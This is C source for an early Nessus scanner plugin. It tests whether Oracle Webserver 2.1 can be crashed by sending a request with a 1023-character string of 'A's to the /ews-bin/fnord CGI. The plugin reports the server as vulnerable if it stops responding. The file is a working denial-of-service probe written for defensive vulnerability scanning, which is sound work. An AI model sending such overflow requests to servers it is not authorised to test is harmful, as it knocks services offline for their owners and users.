/*
 * 
 * ows_overflow
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h> 


#define NAME "Oracle Webserver denial of service"
#define DESC "\
Version 2.1 of Oracle Webserver can be lead to a\n\
denial of service if it is sent a too long string\n\
argument\n\
Risk factor : Medium"
#define COPYRIGHT "no copyright"
#define SUMM "overflows the buffer of the remote ows"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	plug_set_dep(desc, "find_service.nes");
	return(0);
}



PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	int port = (int)plug_get_key(args, "Services/www");
	if(!port)port = 80;
	if(host_get_port_state(args, port)<=0)return(0);
	if(is_cgi_installed(args, "/ews-bin/fnord"))
	{
	char * buffer;
	char * crap;
	crap = emalloc(1024);
	memset(crap, 'A', 1023);
	buffer = emalloc(2048);
	
	 sprintf(buffer, "/ews-bin/fnord?foo=%s\n",
	  	crap);
	efree(&crap);
	
	if(!is_cgi_installed(args, buffer))
	{
	 post_hole(args, port,
"The remote oracle web server could be lead to a denial\n\
of service by sending a too long argument to /ows-bin/fnord\n\
Solution : upgrade or downgrade to version 2.0");
	}
	efree(&buffer);
	}
	return(0);
}

